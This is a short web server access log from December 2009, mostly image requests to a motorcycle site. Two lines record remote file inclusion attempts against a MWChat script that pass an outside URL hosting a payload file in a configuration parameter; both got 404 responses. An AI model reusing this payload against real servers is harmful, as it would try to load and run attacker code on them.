66.11.117.195 - - [13/Dec/2009:10:46:43 -0800] "GET /logs/access_080513.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.119.153.189 - - [13/Dec/2009:10:46:50 -0800] "GET /blog/wp-content/gallery/2008-yuma/001.jpg HTTP/1.1" 200 323977 "http://www.st-owners.com/forums/showthread.php?t=72916&page=2" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "dmulk.com"
207.119.153.189 - - [13/Dec/2009:10:46:50 -0800] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "http://www.st-owners.com/forums/showthread.php?t=72916&page=2" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.dmulk.com"
207.119.153.189 - - [13/Dec/2009:10:46:50 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.st-owners.com/forums/showthread.php?t=72916&page=2" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.dmulk.com"
207.119.153.189 - - [13/Dec/2009:10:46:50 -0800] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 200 216057 "http://www.st-owners.com/forums/showthread.php?t=72916&page=2" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.dmulk.com"
207.119.153.189 - - [13/Dec/2009:10:46:50 -0800] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 109371 "http://www.st-owners.com/forums/showthread.php?t=72916&page=2" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:10:46:54 -0800] "GET /logs/access_080724.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.119.153.189 - - [13/Dec/2009:10:46:55 -0800] "GET /bikes/2k6klr650/klr002.JPG HTTP/1.1" 200 287373 "http://www.st-owners.com/forums/showthread.php?t=72916&page=2" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.dmulk.com"
